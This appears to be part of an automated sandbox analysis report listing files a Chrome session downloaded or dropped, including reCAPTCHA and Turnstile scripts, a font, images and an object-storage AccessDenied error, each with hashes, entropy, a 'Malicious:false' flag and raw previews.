                                                                                                                                                                                                                                  Entropy (8bit):7.965155407230081
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:4A1B4AC15DD101977BEFD910D9B894D5
                                                                                                                                                                                                                                  SHA1:643CAAAB8FAC06520939C489A7407135F7E9CEAE
                                                                                                                                                                                                                                  SHA-256:30E1ADA61A5A6C2632E2DF73FB5A02499B8AF4108A46FF092E7174BFBF955F80
                                                                                                                                                                                                                                  SHA-512:424046E154F1D470619539CF7AD1CA6346E58EFCF245132D17FE48260B1D13464D494721C1ED2D58A4F89E5B7C54CF12FFBB7C4CA0188576F87ABB463A47E492
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..`[<.i.......a.|........Cm.........g4.z|.'.. \...k[Ei.....l.:.....f...'.C.r.&vG.Z|...M...V.RV%QX.n....=M.O....`..F...UJ.jj..i.c.j.,'.R..wU*j..Ga....'w.cxe..5.o.1./.I..R...98.K....I..R,{.GG..laB..5-#Tc..r....E ..Q...f.?N..N..y.<..-...H...5.^Q...g/...z....."Q..%..<..vG...........X|...oSp..{r+'..N.....0.S./..T....XD&.D.i.B..=...]...n.9Y..B.......1.6....
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (551)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):649943
                                                                                                                                                                                                                                  Entropy (8bit):5.8525233765817575
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:4116EE54BBFBB8DF08420949AB678F11
                                                                                                                                                                                                                                  SHA1:433E7E67D99594C14234F3796B91B98D7B950256
                                                                                                                                                                                                                                  SHA-256:1B3CB395ADD1F862EAE59C35FBFF46D3B4EFCFB41E9BDABA14D8F57BD4102291
                                                                                                                                                                                                                                  SHA-512:45D2526E5B510C631909A363005BB43F8EE574E4E9784827FFC18AD96763DFA33467C3C0508DF00940F023FF85406D250DB883BD23C13238142186803692BB1F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://www.gstatic.com/recaptcha/releases/ItfkQiGBlJDHuTkOhlT3zHpB/recaptcha__en.js
                                                                                                                                                                                                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2018 Google Inc. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var dL=function(){return[function(e,U,b,V,N,W,Q,C,L,E,R,I){if(((R=[1,24,37],e)+9>>4>=2&&(e^43)<9&&(I=r[36](18,w[3](14,28),U)),e-6&15)==R[0]){for(C=((E=bx.window[wL][(L=[".eap.initTwoFactorVerificationHandle",".render",".execute"],Ik)()]&&bx.window[wL][Ik()].indexOf(b)!==-1,bx.window[wL])[Ik()]=[],W=w[18](77,N),W).next();!C.done;C=W.next())Q=C.value,g[R[2]](50,a[2].bind(null,R[0]),Q+L[R[0]]),g[R[2]](50,Y[43].bind(null,4),Q+U),g[R[2]](30,w[26].bind(null,64),Q+".getResponse"),g[R[2]](18,l[35].bind(null,.R[0]),Q+L[2]),Q==q8&&E&&(g[R[2]](18,G[12].bi
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17174
                                                                                                                                                                                                                                  Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                                  SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                                  SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                                  SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):15552
                                                                                                                                                                                                                                  Entropy (8bit):7.983966851275127
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                                                                                                                                                                                                                  SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                                                                                                                                                                                                                  SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                                                                                                                                                                                                                  SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                                                                                                                                  Preview:wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v.*.7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....|...H....Fk.*-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..|..d...|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):226
                                                                                                                                                                                                                                  Entropy (8bit):5.068974373223099
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:52D7891B4F7223BBF39868F554FD0CA7
                                                                                                                                                                                                                                  SHA1:5DEFBBB6CA71D72CB0CD9EA208931408A90B844B
                                                                                                                                                                                                                                  SHA-256:5FD022418E8D68043D78BAE228B7EE53BA6D9A617C6A4AB235D18C285DAE0827
                                                                                                                                                                                                                                  SHA-512:64644410A78EE73C811DBEA462D7047ACD65955E27F768389A4C8E815C79F0D44C4CF6796EB3D881BDB1E626A671526327736DBE69872C803BBB42525CEED72D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://microcmg.jp-osa-1.linodeobjects.com/favicon.ico
                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8"?><Error><Code>AccessDenied</Code><BucketName>microcmg</BucketName><RequestId>tx00000e3a7839e86c9e2f7-00680d2cdd-f6a2eead-default</RequestId><HostId>f6a2eead-default-default</HostId></Error>
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (48122)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):48123
                                                                                                                                                                                                                                  Entropy (8bit):5.34269395870303
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:3ED4AB6463FDABE2783A7A7828E94177
                                                                                                                                                                                                                                  SHA1:C80F67F86421DD2C071D5ABC70337877DB648266
                                                                                                                                                                                                                                  SHA-256:91CE8BCEF253FA49B7BBEC10FA3C456261336414CAA9DA52E94988B6A44D1780
                                                                                                                                                                                                                                  SHA-512:0F21AF26DA47236EA36677C973BBD8EAA0B6977C1C1BD342E9504DE36EA4238A12375F717F18A45405AAEBA3530E6DF146D737DDC106BB1ADD070DF44510A566
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://challenges.cloudflare.com/turnstile/v0/g/44e6f86df4dc/api.js
                                                                                                                                                                                                                                  Preview:"use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){jt(l,o,c,v,h,"next",s)}function h(s){jt(l,o,c,v,h,"throw",s)}v(void 0)})}}function P(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):P(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Pe(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):600
                                                                                                                                                                                                                                  Entropy (8bit):7.391634169810707
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                  MD5:0F2A4639B8A4CB30C76E8333C00D30A6
                                                                                                                                                                                                                                  SHA1:57E273A270BB864970D747C74B3F0A7C8E515B13
                                                                                                                                                                                                                                  SHA-256:44B988703019CD6BFA86C91840FECF2A42B611B364E3EEA2F4EB63BF62714E98
                                                                                                                                                                                                                                  SHA-512:3EA72C7E8702D2E9D94B0FAA6FA095A33AB8BC6EC2891F8B3165CE29A9CCF2114FAEF424FA03FD4B9D06785326284C1BB2087CE05E249CCAC65418361BFA7C51
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  URL:https://www.gstatic.com/recaptcha/api2/refresh_2x.png
                                                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..M+.Q.....&/....&......6...|.I..).o.I.X..#.@.bb.D.'5....m...=..y........{....<.P..;.H......f...3l...M.I...j2.....3..1x..S......9..<m...E.'F'.. ...M.j...C..c.5.-..F..3H./F!.."V.e.i.}.Y....../.rw...@...].rp...`CQo(.....J...u.".!E...$.^$...k....b...*.@.^.;.u5.*.......H/Q{..$..'..........w...r.+xS.uR..J.......GD.O./.. G7..l...J.t.3.S...N.7...e..s.-Jlj)..5E....E.;8w4.k..=.li.G...1.c....p,T6;....1.oW.%.2,..Z..a...*m.s}T1F....Hr.1......<x0.....-.i......IEND.B`.
                                                                                                                                                                                                                                  No static file info